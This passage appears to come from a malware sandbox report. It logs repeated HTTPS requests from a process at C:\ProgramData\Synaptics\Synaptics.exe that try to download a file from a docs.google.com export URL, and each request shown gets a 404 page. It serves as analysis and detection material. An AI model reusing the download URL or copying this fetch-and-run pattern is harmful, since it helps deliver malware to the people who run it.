                                                                                                                                                                                        2022-05-17 11:31:50 UTC460INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:50 UTC460INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        15192.168.2.349750142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:31 UTC43OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:31 UTC47INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:31 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-RyHf1bHbe8B35gh2IlfmPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:31 UTC48INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 4b 6d 56 53 62 51 70 70 71 54 2b 61 4b 75 6f 73 32 65 47 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7KmVSbQppqT+aKuos2eGmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:31 UTC50INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:31 UTC50INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        150192.168.2.349914142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC457OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC460INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-M2X3p3RI4yrbmEYvQDl3KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC462INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 43 32 6a 7a 4c 51 44 39 4e 76 73 61 54 55 50 55 44 35 6c 37 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iC2jzLQD9NvsaTUPUD5l7A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:50 UTC463INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:50 UTC463INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        151192.168.2.349915142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC460OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC464INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-7NHcQsvWetbdm/R+x5yBZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC465INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:50 UTC465INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 4b 5a 52 33 4e 6a 48 37 6a 76 36 64 79 77 55 59 4b 49 69 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SKZR3NjH7jv6dywUYKIigQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:50 UTC466INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:50 UTC466INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        152192.168.2.349916142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC463OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC467INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-us0Coy2gjwJ6aND95T24Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC468INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 77 57 52 6d 31 31 47 72 46 62 2f 58 4d 67 4a 72 4e 48 70 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6wWRm11GrFb/XMgJrNHp8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:50 UTC469INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:50 UTC470INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        153192.168.2.349918142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC466OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        154192.168.2.349921142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:50 UTC470OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:50 UTC470INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:50 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-pml4D7x9wGtUAbv9R89hbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:50 UTC471INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:50 UTC471INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 39 68 37 7a 63 74 6e 34 38 75 50 49 5a 66 78 69 50 37 67 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="49h7zctn48uPIZfxiP7g4g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
